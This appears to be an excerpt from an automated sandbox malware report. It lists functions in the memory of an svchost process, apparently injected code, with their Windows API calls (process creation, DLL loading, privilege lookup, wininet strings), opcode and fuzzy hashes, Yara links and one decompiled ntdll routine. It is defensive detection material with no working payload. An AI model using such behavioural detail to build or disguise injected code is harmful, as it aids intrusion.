                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A29076 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 84sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(000007D0), ref: 02A29128
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_2a10000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: net.dll$wininet.dll
                                                            • API String ID: 3472027048-1269752229
                                                            • Opcode ID: 8ec4b1d73a075c9b844aef7dbe3b57d0397bb643e604caa7d5ee24268aea44b1
                                                            • Instruction ID: 17fb4a0c401dfd50ce4b55b7f79aad106f0aab3a0de38c8859f764ecc6075d54
                                                            • Opcode Fuzzy Hash: 8ec4b1d73a075c9b844aef7dbe3b57d0397bb643e604caa7d5ee24268aea44b1
                                                            • Instruction Fuzzy Hash: 1B21BFB1900215ABD714EF69C8C4FA7B7B5EB48B04F108019E62D6B245DB74A558CFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A2A670 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02A13AF8), ref: 02A2A69D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_2a10000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID: .z`
                                                            • API String ID: 3298025750-1441809116
                                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                            • Instruction ID: c28e800d68b98a27c3a5b702e9e9a329d87d74d155b387801ec83ca063a57b7d
                                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                            • Instruction Fuzzy Hash: B0E04FB12002186BD714DF59CC44EA777ADEF88750F118559FD1C57241C630F914CAF0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A22760 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoInitialize.OLE32(00000000,00000000,02A13A1A,00000000), ref: 02A22777
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_2a10000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID: @J7<
                                                            • API String ID: 2538663250-2016760708
                                                            • Opcode ID: 8296373e09b2688dba4aae03a4466b30fdd64ecc5eca1f4d810b493abce50cc4
                                                            • Instruction ID: 34d2d775426da013b558cb865cbc86cf019fd929cbcb02143d8921933e12f353
                                                            • Opcode Fuzzy Hash: 8296373e09b2688dba4aae03a4466b30fdd64ecc5eca1f4d810b493abce50cc4
                                                            • Instruction Fuzzy Hash: 953132B5A002199FDB00DFD8C880AEFB7B9FF88304B108559E915E7214DB75EE05CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A18310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02A1836A
                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02A1838B
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_2a10000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID:
                                                            • API String ID: 1836367815-0
                                                            • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                            • Instruction ID: 18c932f338d1e167d55f8d0d2081fb7f69144497efb89876148efbc899db3040
                                                            • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                            • Instruction Fuzzy Hash: 6101F231A802387BE720A6949D42FFE772D5B00F60F080158FF04BA1C1EAA4690A4AF6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A182D3 Relevance: 3.0, APIs: 2, Instructions: 33threadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02A1836A
                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02A1838B
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_2a10000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID:
                                                            • API String ID: 1836367815-0
                                                            • Opcode ID: 4fc1921e772b2993f285ba6ba44bed5a6d281afe441ec9dc8585667c1f5dee1f
                                                            • Instruction ID: 5d26b6c791e5ac316e7c9209c3c4d93718a77b21d7e2d4fd292a3c44e8d429af
                                                            • Opcode Fuzzy Hash: 4fc1921e772b2993f285ba6ba44bed5a6d281afe441ec9dc8585667c1f5dee1f
                                                            • Instruction Fuzzy Hash: EDF0EC317412253AE7119B585C46FBD771DAF42B25F1C0199FF04AE0C5DE95500587F1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A1ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02A1AD62
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_2a10000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                            • Instruction ID: e2fd7d0e7b83d36d619eddaab8bdf2ea97cdf48101d5b9491d1e9f18f1166f1d
                                                            • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                            • Instruction Fuzzy Hash: E4015AB5E4020DABDF10EBA4DD81F9EB3B99B14318F1045A5A908A7241FA30EB08CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A2A6DD Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02A2A734
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_2a10000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateInternalProcess
                                                            • String ID:
                                                            • API String ID: 2186235152-0
                                                            • Opcode ID: 8ceb1918f434a64c93b60195884dd0e445fc3b0a4014ede29b729fae9d4b2e24
                                                            • Instruction ID: d5c2e466165ed4ca4a86ffd8c0b53ed28e3d5d3d791cf38560e48766f3c1be91
                                                            • Opcode Fuzzy Hash: 8ceb1918f434a64c93b60195884dd0e445fc3b0a4014ede29b729fae9d4b2e24
                                                            • Instruction Fuzzy Hash: BE01A4B2210108AFCB54DF89DC80EEB37AAAF8C754F158258FA5DD7250C630E851CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A2A6E0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02A2A734
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_2a10000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateInternalProcess
                                                            • String ID:
                                                            • API String ID: 2186235152-0
                                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                            • Instruction ID: 4a89c27652fa6b2bd3e2bbc33a31496bc31f43280c712a5c87c0172d72363572
                                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                            • Instruction Fuzzy Hash: 2A01AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A291B0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02A1F050,?,?,00000000), ref: 02A291EC
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_2a10000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: 342052936165191d8d59341284a610888e0964bc78b57980bd67943c0755f067
                                                            • Instruction ID: c670eae46f17ce2cfee240c55ad35d25887a67ca92e0da3f2e287dbf58a78735
                                                            • Opcode Fuzzy Hash: 342052936165191d8d59341284a610888e0964bc78b57980bd67943c0755f067
                                                            • Instruction Fuzzy Hash: 18E06D373803243AE220669DAC02FA7B29D8B81B20F240026FA0DEA2C0D995F40546A8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A2A7C1 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02A1F1D2,02A1F1D2,?,00000000,?,?), ref: 02A2A800
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_2a10000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LookupPrivilegeValue
                                                            • String ID:
                                                            • API String ID: 3899507212-0
                                                            • Opcode ID: e19ac6c33e82d6e1a44215ee418d1bec032dbe9e8068b6c93aeab14fccc2d360
                                                            • Instruction ID: f99f7b9378e133986fb7670fe7beb9d7d97e6a31d7c97b7daf1ab1000c88a771
                                                            • Opcode Fuzzy Hash: e19ac6c33e82d6e1a44215ee418d1bec032dbe9e8068b6c93aeab14fccc2d360
                                                            • Instruction Fuzzy Hash: D2E065B1600104BFC720DF54CC80EDB77A9DF89750F118555F91DA7241CA31A804CBB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A2A630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(02A24536,?,02A24CAF,02A24CAF,?,02A24536,?,?,?,?,?,00000000,00000000,?), ref: 02A2A65D
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_2a10000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                            • Instruction ID: 866ab80abcb4894761b88fe692a16ebe7df1dd86390b7c0d76a63088acb2f2ec
                                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                            • Instruction Fuzzy Hash: 6CE012B2200218ABDB14EF99CC40EA777ADEF88A54F118559BA185B242CA30F9148AB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A2A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02A1F1D2,02A1F1D2,?,00000000,?,?), ref: 02A2A800
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_2a10000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LookupPrivilegeValue
                                                            • String ID:
                                                            • API String ID: 3899507212-0
                                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                            • Instruction ID: fcd1307e634c2f7f68d288311ab9d0e6dd245c09d0e4cf4de93d2ce204a7d555
                                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                            • Instruction Fuzzy Hash: 5CE01AB12002186BDB10DF49CC84EE737ADEF88650F118155BA0C57241C934E8148BF5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A1F6C7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,02A18D14,?), ref: 02A1F6FB
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_2a10000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 62fc9c5b31a535d79e922afae0eac199eca016de96705e881074599603ce9709
                                                            • Instruction ID: 7b1479f75c4a5e232fa06389abdcbc7a937ec7d269ab9d2449269061da318e1e
                                                            • Opcode Fuzzy Hash: 62fc9c5b31a535d79e922afae0eac199eca016de96705e881074599603ce9709
                                                            • Instruction Fuzzy Hash: F5D022D2AD83C42EF728BFF01D12FDB11098B21A24F9A0E54F5B8EA4D7EE84C0210438
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A1F6CF Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,02A18D14,?), ref: 02A1F6FB
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_2a10000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 3853248178871bab4f168448b0a815a7fbcf8fc44fcd747b05f7471f6b81d7d9
                                                            • Instruction ID: 6e76267b2eac289baa232def4984240965eb909e5129f04d2344a3efb5a4aad5
                                                            • Opcode Fuzzy Hash: 3853248178871bab4f168448b0a815a7fbcf8fc44fcd747b05f7471f6b81d7d9
                                                            • Instruction Fuzzy Hash: A7D05E616903042BE710BBA49C22F6632895B58B14F094064F958DB2C3DD50E1004961
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A1F6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,02A18D14,?), ref: 02A1F6FB
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_2a10000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                            • Instruction ID: 9256f69680c77598555dd7d77b01ace19cd6bc024f97f94d0a4d365b5d8472cd
                                                            • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                            • Instruction Fuzzy Hash: 21D05E616903082AE610ABA89C12F6632895B54A14F490064F958DA2C3DD50E0004965
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0346967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                            • Associated: 0000001A.00000002.874960050.000000000351B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_3400000_svchost.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 408f98bb28fad13db04a7addddd82894b10a77085ba04b0c71b23c49688623a5
                                                            • Instruction ID: 0e64d032b35b3d998cbe89a51822748acb3deb99f77375d407e35f5d770b0972
                                                            • Opcode Fuzzy Hash: 408f98bb28fad13db04a7addddd82894b10a77085ba04b0c71b23c49688623a5
                                                            • Instruction Fuzzy Hash: 80B09B71D015C5C9E711D770470871779047BD1741F16C053D1020A51A4778C091F5BA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 034BFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 53%
                                                            			E034BFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0346CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E034B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E034B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                            0x034bfdda
                                                            0x034bfde2
                                                            0x034bfde5
                                                            0x034bfdec
                                                            0x034bfdfa
                                                            0x034bfdff
                                                            0x034bfe0a
                                                            0x034bfe0f
                                                            0x034bfe17
                                                            0x034bfe1e
                                                            0x034bfe19
                                                            0x034bfe19
                                                            0x034bfe19
                                                            0x034bfe20
                                                            0x034bfe21
                                                            0x034bfe22
                                                            0x034bfe25
                                                            0x034bfe40

                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 034BFDFA
                                                            Strings
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 034BFE2B
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 034BFE01
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                            • Associated: 0000001A.00000002.874960050.000000000351B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_3400000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                            • API String ID: 885266447-3903918235
                                                            • Opcode ID: 48a28a726b28cf5d7e603c1c7306187084509b6e8ce8f2559e4599d0708144bd
                                                            • Instruction ID: 9b3b04eac4a6400fe42b3aed786aea1c19f4fd09ceb43dbbf9a7a1ae7cceeb66
                                                            • Opcode Fuzzy Hash: 48a28a726b28cf5d7e603c1c7306187084509b6e8ce8f2559e4599d0708144bd
                                                            • Instruction Fuzzy Hash: 61F0C8362006017FDA215E45DC01E67BB6ADB45730F240216F6285D5D1D962B83086B8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%